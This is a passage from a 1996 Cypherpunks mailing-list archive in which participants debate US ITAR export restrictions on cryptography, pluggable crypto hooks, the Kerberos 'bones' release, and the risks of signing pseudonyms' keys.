threatened with conspiracy to violate the Munitions Act charges, might have
its shipments seized, etc.

Second, folks at RSADSI told me several years ago that it even violates the
ITARs to send cryptographic knowledge out of the country (especially, in
this context, with the intention of the folks with the knowledge being the
"Geneva" operation of RSADSI, for example).

[Note: This is really where all the stuff about exporting code comes from,
and why the debate about exporting the RSA-in-Perl t-shirt is not really
hitting the main point. The NSA and State have no real concern about copies
of Schneier's book going out, given that they know they can't stop it
anyway and the stuff in it has already been published worldwide. No, their
real concern is ensuring that Lotus does not skirt the whole crypto exports
issue by sending a team to an overseas location to develop a core module
_there_. Before someone like Duncan protests that this strategy is
ultimately--and maybe even soon--doomed to fail, for the many reasons we
discuss often, I agree. But for the nonce, NSA and State are trying to
fight a holding action, and keeping U.S. companies from distributing strong
crypto is currently within their powers in a way that domestic control of
crypto is not.]

Third, even _interoperability_ is disliked by the NSA. Thus, if Lotus Notes
says that it will support an open standard such that its package can
communicate easily with Europe-developed crypto modules, the NSA will
consider this to be a means of skirting the ITARs. (This was actually the
main strength of PGP, as I saw it, that a "standard" could be supported on
many platforms, and once the program was proliferated to many countries,
all could interoperate. Note that there are very few other such
interoperable crypto programs---Lotus Notes talks to other Lotus Notes
sites (a chokepoint in controlling distribution), MicrosoftMail and other
products talk to other MS products, RSADSI's own standalone crypto program,
Mailsafe, talks to other Mailsafe users (again, a chokepoint for
distribution), and so on. [Side note: this situation is changing as
standards are adopted, as the Web takes on a more prominent role. But I
believe it to still be true that strong crypto in the U.S. cannot easily
talk to strong crypto in Europe and Asian, except via things like PGP. If
I'm wrong, I'd appreciate hearing about some examples.]

Fourth, bizarre as it may sound, _imported_ strong crypto may face the same
restrictions if attempts are made to _export_ it! Even if the code is
unchanged. (The only justification for this position is that the U.S. is
trying to create a chokepoint for control...there is no logical reason for
a product imported from Israel to then not be allowed for export back to
Israel, except that NSA and State hope to interfere with markets and thus
have more control over things.)

The effect of this restriction is that companies planning to import crypto
from, say, Switzerland, and integrate it into their products will still
face the ITARs when they try to export the product. And even having _two_
versions, one developed in the U.S. and one developed in Switzerland, will
then run into the issues already cited: skirting the law by having hooks,
(maybe) engaging in a conspiracy to export cryptographic talent for the
purposes of skirting the ITARs, and having interoperable versions.

Fifth, there are cryptographically-competent companies and programmers in
Europe. Companies such as Crypto AG, companies in Israel, programmers in
the U.K., Slovenia, Romania, and all over. (Many on this list, in fact.)
And programmers and very competent crypto folks in Australia, New Zealand,
etc.

Given the relatively small teams that built capable browsers, and given the
capable programmers, and given the (alleged) huge losses American companies
are suffering for lack of secure products, why are there no
Europe-developed browsers with strong crypto?

I promised conspiracies. My points above implicitly involve some
behind-the-scenes pressuring (and I know this to be the case from
first-hand accounts), but here are some more:

-- maybe even the European companies have been threatened, perhaps by their
own crypto-fearful intelligence agencies (recall the many reports of key
escrow talk in Germany, France, Sweden, etc.)

-- maybe, as some have claimed, the European crypto companies, such as
Zug-based Crypto AG, are actually controlled or influenced by the NSA.
(This was a recent thread here, dismissed by the list.censors as
"off-topic," but, I think, in actuality a terribly important topic to
consider.)

-- maybe the Europeans just don't want a piece of the Web browser market,
maybe the prospect of a software company reaching a capitalization of $5
billion in less than two years doesn't excite them. (Maybe Clinton didn't
inhale.)

In a kind of variant of the Fermi Paradox ("Why aren't they here?,"
referrring to alien visitors), my question is this: "Why aren't we able to
solve this pressing problem of not being able to export strong crypto by
_importing_ it?"

I don't think it's an accident, or laziness on the part of European and
Asian companies, that we haven't gotten around the U.S.'s laws about
exporting crypto by getting our crypto from competent programmers and
companies outside the U.S.

Comments?

--Tim May



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stephen_albert@alpha.c2.org (Stephen Albert)
Date: Thu, 25 Jan 1996 11:04:29 +0800
To: cypherpunks@toad.com
Subject: Netscape & open NNTP servers
Message-ID: <199601250101.RAA01312@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've got a question that I feel like I *should* know the answer to, but don't.

Say I configure Netscape to point through an open http proxy, and then connect t
an open NNTP server.  I don't know much about how proxies work.  Does the NNTP 
connection go through the proxy or directly from my machine?  As I understand it
if it does the first, then I don't have to worry about the NNTP server's log 
file, if any.  But if it does the second, I do.

Am I in the ballpark here?

ObCrypto: Not-readily-traceable posting with less hassle than a mail-to-news 
gateway seems to have some privacy relevance, even if it's not directly crypto.

Stephen "To NNTP Serve Man" Albert
stephen_albert@alpha.c2.org <*> PGP key on request and on servers



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQbVikimCtQtWVIdAQEjZgf+KFK8AzLY8ndSBAmWzQAwqMCmbA3IR8yl
TU/c2f/FAMRypAGf+IcKIgmLAPxjbOBSvCmYv8cSXBtb/hhOFbmzIf5EY5QyfcMt
OVsMk80gHJxBiUaSYetwklkRub1dqan0R2fUfQq1ey2ZUZk3OvUB4gTW5XPKNpND
HxLINjJ2Ph6SH4AqCZ0hNwFkk3gtZsLGTgUHhdrkhaAKnEBSXWN9mMvkNHngScRq
A0SlVehxwj8yFLF5rf1G82AM3fdZrdWhMDlWmVCkgpo5mr5AXtYpfHKa9ZsesM8O
eRVvlVzXU+w4Y1B5swM5QDpezsPqxBtTn0JEb78mGM4gCoVyEi06Ow==
=gwrx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Sat, 27 Jan 1996 05:32:11 +0800
To: cypherpunks@toad.com
Subject: Re: Signing nyms' keys (Was: Report on Portland Cpunks...)
Message-ID: <2.2.32.19960125011259.0069b280@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:42 PM 1/24/96 PST, janzen@idacom.hp.com wrote:

>Furthermore, by signing a nym's key you place yourself at risk.  If you
>sign the nym's key with your own key -- or sign using the key of your
>own nym, and that nym is subsequently "outed" -- then anyone wishing to
>find the individual(s) behind any nym whose key you've signed can
>attempt to coerce you into revealing this information, since you have
>claimed to know it.

This is the real problem, one which doesn't (to me) have a ready solution.
If others can demonstrate that there [is|is not] some fairly straightforward
way around it, I'd be happy to read it.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 27 Jan 1996 01:29:01 +0800
To: Pete Loshin <pete@loshin.com>
Subject: Re: FW: Veriphone and Netscape Team to Provide Internet Payment Solutions
In-Reply-To: <01BAE929.12D6ADE0@ploshin.tiac.net>
Message-ID: <3106D971.D58@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Pete Loshin wrote:
> 
> Here's the Netscape press release on their Verifone collaboration;
> note that they explain nothing about 128 bits or 1024 bits--but Netscape
> now appears to claim to be the sole developers of SEPP.

  Thanks for pointing out the bit about us claiming to have developed
SEPP.  I spoke to our Director of PR and it appears that the sentance
was mangled as the release was going through several rounds of revisions
between our PR dept. and VeriFone's.  A corrected version of the release
should be posted on our web site in the next few days.  It properly
indicate that SEPP (now SET?) is a cross industry effort that Netscape is
participating in.

  Sorry, no bugs bounty for press releases.  :-(

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Jan 1996 07:11:33 +0800
To: cypherpunks@toad.com
Subject: NON_nsa
Message-ID: <199601242224.RAA11535@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   February Byte reviews nine non-US (non-NSA, wah?)
   crypto programs, ranging from uses for a single laptop to
   company networks to transmissions on the Internet, by
   Martin Banks, a UK writer. Admire these deadpan marketing
   names:

      Deadlock (uk)
      EasySafe and MasterSafe (il)
      Latches for Windows (uk)
      Safeguard Easy (de)
      SecureData (uk)
      SmartLock (it)
      StopLock (uk)
      TeamWare Crypto (uk)

      and, more Jim Carey-ly:

      Visage (uk) -- which uses faces as passphrase!


   NON_nsa  (For those with non-key-access to Byte)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: oO F145C0 Oo <fiasco@echo.sound.net>
Date: Fri, 26 Jan 1996 06:41:28 +0800
To: cypherpunks@toad.com
Subject: V-chip?
Message-ID: <Pine.SOL.3.91.960124174011.17116A-100000@echo.sound.net>
MIME-Version: 1.0
Content-Type: text/plain


     Apparently the US government is planning on starting up its V-chip 
program again, which will allow public/cable TV to be censored at will. 
What does everyone thing about this ploy? And whats next? Chips in my 
radio, to prevent music, or a chip in my phone to make sure i dont call 
anyone bad? The V-chip is just as much a privacy/1st amendment violation 
as the clipper chip is/was. I believe the worst part of the V-chip plan, 
is to force all new TV's manufactured or imported to the US, to have this 
new chip. Could this chip even be part of a Chinese lottery? 


					......fiasco






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 27 Jan 1996 09:15:40 +0800
To: djw@vplus.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242348.PAA03559@ns1.vplus.com>
Message-ID: <9601242357.AA02688@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Dan Weinstein writes:
 > m5@dev.tivoli.com (Mike McNally) Wrote:
 > > Dan Weinstein writes:
 > >  > >By the way, I really think Netscape should simply ship Jeff and other
 > >  > >people to the Amsterdam office...
 > >  > 
 > >  > Wrong, this would be a violation of ITAR.
 > > 
 > > I don't understand; are you saying Jeff's brain is a munition under
 > > the ITAR?
 > 
 > I forget how it is termed in ITAR, but expertise can't be exported 
 > either.

Uhh, I'd like a second opinion please doc.  Are you suggesting that
whenever anybody with cryptographic expertise (like, maybe, anybody on
this mailing list) leaves the country we're in violation of munitions
export laws?

Is somebody who knows how to build a rocket in the same boat?

 > like I suggested before any programers who gained their knowledge of 
 > crypto programing in the U.S. and then went abroad and developed 
 > crypto software would be in danger of prosecution under ITAR if they 
 > ever returned to the U.S..

This sounds fishy to me.  I don't recall reading anything to suggest
that export of cryptographic software (or any other munition) requires
that the stuff be *used* outside the US for an offense to be
committed; why should export of a cryptographer's wetware be any
different?  Either the expertise leaves the country or it doesn't, I'd
think.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 25 Jan 1996 13:31:14 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242303.SAA14589@amsterdam.lcs.mit.edu>
Message-ID: <3106E47B.1CAB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


David Mazieres wrote:
> 
> In article <3105FBFC.4DC9@netscape.com> Jeff Weinstein <jsw@netscape.com> writes:
> >   The other way would be to export a binary with pluggable crypto,
> > which is generally agreed to be regulated by the ITAR in the same
> > way as software that actually contains crypto.
> 
> How did kerberos avoid this?  The "bones" distribution of kerberos
> without crypto was not regulated by ITAR, right?

  As others have noted, they removed the calls to the crypto code.

  I don't think that the TLAs are concerned about people at
foreign universities using kerberos.  They are much more worried
about mass market products.  If we did the same thing as was done
for kerberos, then exported the code to a foreign subsidiary, I
believe that the government would try to make a case against us
that we had participated in a conspiracy to circumvent the
export restrictions.

  The government continues to use FUD to impose defacto restrictions
on what we can do.  When they decided not to prosecute PRZ they did
not clarify and said that they may decide at any time to go after
someone else.  They continue to try to wiggle out of stating a
clear, firm policy.  I think that our current efforts should be
geared towards pinning them down, then once we have specific
restrictions we can attack them.  The Phil Karn case is important
because it will help to clarify the ITAR restrictions.  Even 
Raph's RSA T-shirt CJR may help to clarify the restrictions into
something that we can really fight.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Thu, 25 Jan 1996 07:25:17 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <2.2.32.19960123140650.00708e08@mail.interlog.com>
Message-ID: <199601242303.SAA14589@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <3105FBFC.4DC9@netscape.com> Jeff Weinstein <jsw@netscape.com> writes:
>   The other way would be to export a binary with pluggable crypto,
> which is generally agreed to be regulated by the ITAR in the same
> way as software that actually contains crypto.

How did kerberos avoid this?  The "bones" distribution of kerberos
without crypto was not regulated by ITAR, right?

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 25 Jan 1996 07:56:38 +0800
To: cypherpunks@toad.com
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
Message-ID: <9601242309.AA08202@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Patiwat Panurach asks:
> On Tue, 23 Jan 1996, Duncan Frissell wrote:
> > On the whole, the cypherpunks have gotten very favorable press for a group
> > who's actions may render government policies irrelevant and possibly the
> > governments themselves.
 
> Would you call cypherpunks (as a group and as a philosophy) to be
> influential?  Do you think governments listen to us much?  Are they forced
> to listen to us?  Any stuff to support this?  Please give me your comments.

Yes, I would say the actions of the people active on this list have had
significant effectst. To give one example:

Last summer, 'we' broke 40-bit RC4. Within a week or two, the
US government started to discuss making 64-bit escrowed crypto
exportable (not acceptable, but it's a change).

In the private sector, the opinion in a lot of US firms was 'yeah,
40 bits may be weak, but marketing wants to have a single "secure
version" of the product, so we'll sell the 40 bit  version domestically
and abroad - after all, 40 bits is only theoretically weak - no one's ever
broken it."

After the highly publicized SSL crack, it suddenly became a *lot*
easier for engineers to argue for separate domestic versions with 
stronger encryption. I personally know of three firms where this
occured, and I'm sure there are more.


   

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 26 Jan 1996 10:16:35 +0800
To: owner-cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <9601242316.AA12172@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>How did kerberos avoid this?  The "bones" distribution of kerberos
>without crypto was not regulated by ITAR, right?

The Kerberos bones release:
	Removed the DES code
	Removed the places where DES code was called
It was done by using "unifdef -DNOENCRYPTION" as a filter over all the sources.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 26 Jan 1996 02:52:24 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242303.SAA14589@amsterdam.lcs.mit.edu>
Message-ID: <3106E81E.1CBB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> OK; so what if I have code that says:
> 
> RNG_GenerateRandomBytes(buf, size);
> Hash(outbuf, buf, size);
> /*
>  *  It would be really nice if outbuf were RSA-encrypted
>  *  with (expon,modulus) at this point and the result placed in
>  *  outbuf2, but we have to do the following instead:
>  */
>     for(i=0;i<hashsize;++i) outbuf2[i] = ~outbuf[i];
> fwrite(outbuf2, hashsize, 1, fp);
> 
> Would the above code be export-restricted because it contained wishful
> thinking about how nice it would be to use encryption?

  The problem is that the government refuses to publish the rules.
They make people ask for approval for every piece of code that is
exported.  This gives them lots of wiggle room so that they can keep
changing the rules in the face of technical, legal, or political
innovation.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Thu, 25 Jan 1996 08:10:51 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242303.SAA14589@amsterdam.lcs.mit.edu>
Message-ID: <199601242318.SAA08161@fuseki.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"dm" == David Mazieres <dm@amsterdam.lcs.mit.edu> writes:

dm> How did kerberos avoid this?  The "bones" distribution of kerberos
dm> without crypto was not regulated by ITAR, right?
  In the ``bones'' version not only was the encryption code eliminated
(e.g., the functionality of libdes.a), but the hooks to call such code
disappeared as well.

michael





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 25 Jan 1996 08:06:55 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242303.SAA14589@amsterdam.lcs.mit.edu>
Message-ID: <199601242330.SAA08632@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> How did kerberos avoid this?  The "bones" distribution of kerberos
> without crypto was not regulated by ITAR, right?

Kerberos didn't leave the crypto plugable.  The bones distribution
removed not only the crypto routines but also the calls to the crypto
routines.  It would be hard to call that "pluggable".  It took a lot
of work for someone down under to replace all those crypto calls!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sat, 27 Jan 1996 09:14:13 +0800
To: warlord@MIT.EDU
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242330.SAA08632@toxicwaste.media.mit.edu>
Message-ID: <199601242346.SAA14838@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> cc: Jeff Weinstein <jsw@netscape.com>, cypherpunks@toad.com
> Date: Wed, 24 Jan 1996 18:30:00 EST
> From: Derek Atkins <warlord@MIT.EDU>
> 
> > How did kerberos avoid this?  The "bones" distribution of kerberos
> > without crypto was not regulated by ITAR, right?
> 
> Kerberos didn't leave the crypto plugable.  The bones distribution
> removed not only the crypto routines but also the calls to the crypto
> routines.  It would be hard to call that "pluggable".  It took a lot
> of work for someone down under to replace all those crypto calls!

So where exactly do they draw the line?  You can still construct your
software in such a way that there is a clean boundary between the
crypto stuff and the rest.

For example, could you have an application with a  function:

	authenticate_user (int file_descriptor)

which in the exportable version sends a password, and in the domestic 
version constructs some sort of authenticator?

Could you have an xdr-like function which on in an exportable version
just does argument marshaling and in a domestic version also encrypts?

How exactly are crypto-hooks defined?  This restriction seems orders
of magnitude more bogus than even the ban on exporting actual
encryption.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jan 1996 13:54:45 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: Signing nyms' keys (Was: Report on Portland Cpunks...)
Message-ID: <2.2.32.19960125024933.008d5c4c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:12 PM 1/24/96 -0800, Bruce Baugh wrote:
>At 01:42 PM 1/24/96 PST, janzen@idacom.hp.com wrote:
>
>>Furthermore, by signing a nym's key you place yourself at risk.  If you
>>sign the nym's key with your own key -- or sign using the key of your
>>own nym, and that nym is subsequently "outed" -- then anyone wishing to
>>find the individual(s) behind any nym whose key you've signed can
>>attempt to coerce you into revealing this information, since you have
>>claimed to know it.
>
>This is the real problem, one which doesn't (to me) have a ready solution.
>If others can demonstrate that there [is|is not] some fairly straightforward
>way around it, I'd be happy to read it.

This is a problem with the web of trust in general.  It is known as "Guilt
by Association".  

Person X commits treasonable act A.  All of the persons who are signed on to
his key could be considered to be co-conspirators.  The same applies to
nyms.  The difficulty with prosecuting nyms is finding the link to the real
world individual.  Anyone associated with him/her/it will be considered to
be guilty by reason of key signage or a way of determining who the real
person is...

The only way I see getting around this is only signing nyms with nyms or
having some sort of zero knowlege proof on a key signing authority.
Something where you can issue some sort of proof to the signing authority
that you are who you say you are without giving any information about your
"real" identity.  I know of no foolproof way of doing this...

I guess we are stuck with the "Web of Guilt"...

  
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 27 Jan 1996 09:12:32 +0800
To: cypherpunks@toad.com
Subject: Re:  Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <9601242352.AA12293@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I believe that one minor reason is the PKP chokehold on public-key patents.
It has slowed down adoption within the US, and the RSA licenses for example
tend to get very "interesting" when it involves places where their patents
don't hold.

Last year, how many COTS products had strong crypto? There are very few
software imports into the US.  I don't think crypto is particularly
slighted.

There might be pressure, and there might be dummy front firms, but with
tongue in cheek to emphasize the point, I just think those ferriners
can't code fer shit.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 25 Jan 1996 13:54:51 +0800
To: cypherpunks@toad.com
Subject: another thought about random numbers
Message-ID: <v02110102ad2c27f6b0fb@[198.68.110.19]>
MIME-Version: 1.0
Content-Type: text/plain


While musing over a roulette table, and noticing the preponderence of
electronic games in the various Casinos in Stateline, NV, a thought
occurred: does anyone know what sorts of random number generators those
electronic games use, and how (if at all) they are measured and regulated
by the Nevada Gaming Commission? They might have something to teach us.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dagmar the Surreal <dagmar@accessus.net>
Date: Thu, 25 Jan 1996 11:41:13 +0800
To: cypherpunks@toad.com
Subject: Re: Ultimate Paranoia
Message-ID: <199601250101.TAA30420@mtvernon1.accessus.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 1/22/96 -0500, you wrote:
>For the ultimately paranoid:
>	Don't forget to keep all sensitive info on your standalone
>machine on an encrypted filesystem.  You never know who might show up
>with guns and a search warrant.  But this is truly paranoid.

And _what_, may I ask exactly, is worng with this sort of security?
-----
"In the vacuum of cyberspace, no one can hear the pedestrians scream."
                                        -- Dagmar the Surreal (as sold on TV!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 25 Jan 1996 11:27:36 +0800
To: warlord@MIT.EDU
Subject: Re: Crippled Notes export encryption
Message-ID: <9601250008.AA12407@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>So where exactly do they draw the line?  You can still construct your
>software in such a way that there is a clean boundary between the
>crypto stuff and the rest.

Right.  However, if you call things like "keysize" as oposed to "state"
then they will look askance.

>How exactly are crypto-hooks defined?

On a case-by-case basis.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Jan 1996 12:07:12 +0800
To: cypherpunks@toad.com
Subject: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <199601250016.TAA16471@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by tcmay@got.net (Timothy C. May) on Wed, 24 
Jan  4:59 PM



   A welcome inquiry, Tim.
   
   Is it not likely that the best crypto in many of the
   countries is kept off the market in the national interest,
   cloaked in the greatest secrecy like other crucial weapons
   of survival? Especially to defend it from NSA-like
   predators.

   Was this not the practice in the US before public key genie
   escaped?

   And is surely still the case for the very best US crypto --
   not that which can be readily purchased or purloined.

   The market, and PGP, are probably condoned as a cloak for
   the best, in the US and elsewhere. Or bait. Or traps.

   











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 10:25:19 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <ad2c2068050210046bc9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:56 AM 1/25/96, Derek Atkins wrote:

>Yes, it is a huge can of worms.  Worse, since it is done on a
>case-by-case basis, there really is no clear definition of where the
>exportable vs. non-exportable line actually is.  You need to try it to
>test if it will work or not.

Several people have mentioned the "case by case" nature of the crypto
export situation, and this is of course the key.

I don't claim to have studied the ITARs as, say, Phil Karn or Dan Bernstein
have. Or to to have reviewed relevant case law, precedents, etc. But I'm
not sure it's important.

That is, the Munitions Act and related laws/regulations were set up to meet
certain end goals considered desirable. With considerable flexibility in
interpreting these rules and regulations, State and NSA seek to meet the
end goals they have established, not to scrupulously define the exact
boundaries of the law.

Thus, let me try to think like them and present some situations people have
proposed (or actually filed cases about, a la Bernstein, Karn, etc.), and
*guess* which way things will go. Others may disagree. Here they are:

Situation/Test Case                Likely End Result

* Export of t-shirt           * Foot-dragging, but eventual approval

(foot-dragging because D.C. won't be sure how any decision they make will
be taken)

* Ian Goldberg returning to Canada    * The issue won't even come up

(Students routinely return to Israel, Netherlands, etc. Nobody cares.
Especially with regard to students returing to Canada, which is of course
treated as a backward child of the U.S. for the purposes of crypto policy.)

* Goldberg's team sets up in Zurich   * NSA issues warning to Foobar, Inc.

(In this hypothetical, Ian Goldberg has a team in Berkeley writing the
MongoBrowser Web browser. They decide U.S. laws on crypto export are too
restrictive and decide to move their operation to Zurich. This is clearly
designed to skirt the "spirit" of the Munitions Act/ITARs, and so the
NSA/State will try to head it off. Assuming they even learn it is
happening, which is a very real impediment to practical enforcement. Ex
post facto, MongoBrowser and its programmers could be hassled upon entry to
the U.S. later.)

And so on. In other words, you need to "think like them" with regard to
what's a potentially real threat and what's not. T-shirts are not real
threats, but RSADSI deciding to move its core crypto development to Zurich
is.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Thu, 25 Jan 1996 10:46:47 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: German home banking (fromn RISKS)
In-Reply-To: <v01530500ad2bfe6d4743@[206.86.1.35]>
Message-ID: <199601250030.TAA15203@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Was the person in the basement eavesdroping or actuall performing a
man-in-the-middle attack?

Don't high speed modems transmit and receive on the same frequencies,
using echo cancelation to decode the receive signals?  Does that make
it impossible to eavesdrop on high-speed (i.e. V32bis) modems?

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 27 Jan 1996 07:51:38 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242303.SAA14589@amsterdam.lcs.mit.edu>
Message-ID: <4e6j28$g49@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199601242330.SAA08632@toxicwaste.media.mit.edu>,
Derek Atkins  <warlord@MIT.EDU> wrote:
>> How did kerberos avoid this?  The "bones" distribution of kerberos
>> without crypto was not regulated by ITAR, right?
>
>Kerberos didn't leave the crypto plugable.  The bones distribution
>removed not only the crypto routines but also the calls to the crypto
>routines.  It would be hard to call that "pluggable".  It took a lot
>of work for someone down under to replace all those crypto calls!
>
OK; so what if I have code that says:

RNG_GenerateRandomBytes(buf, size);
Hash(outbuf, buf, size);
/*
 *  It would be really nice if outbuf were RSA-encrypted
 *  with (expon,modulus) at this point and the result placed in
 *  outbuf2, but we have to do the following instead:
 */
    for(i=0;i<hashsize;++i) outbuf2[i] = ~outbuf[i];
fwrite(outbuf2, hashsize, 1, fp);


Would the above code be export-restricted because it contained wishful
thinking about how nice it would be to use encryption?

   - Ian "Maybe I should just go back to Canada..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 25 Jan 1996 13:47:25 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242346.SAA14838@amsterdam.lcs.mit.edu>
Message-ID: <199601250034.TAA09745@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> So where exactly do they draw the line?  You can still construct your
> software in such a way that there is a clean boundary between the
> crypto stuff and the rest.

The line is drawn, AFAIK, at the actual crypto routines.  You cannot
export the crypto routines, and the functions that call the crypto
routines.

> For example, could you have an application with a  function:
> 
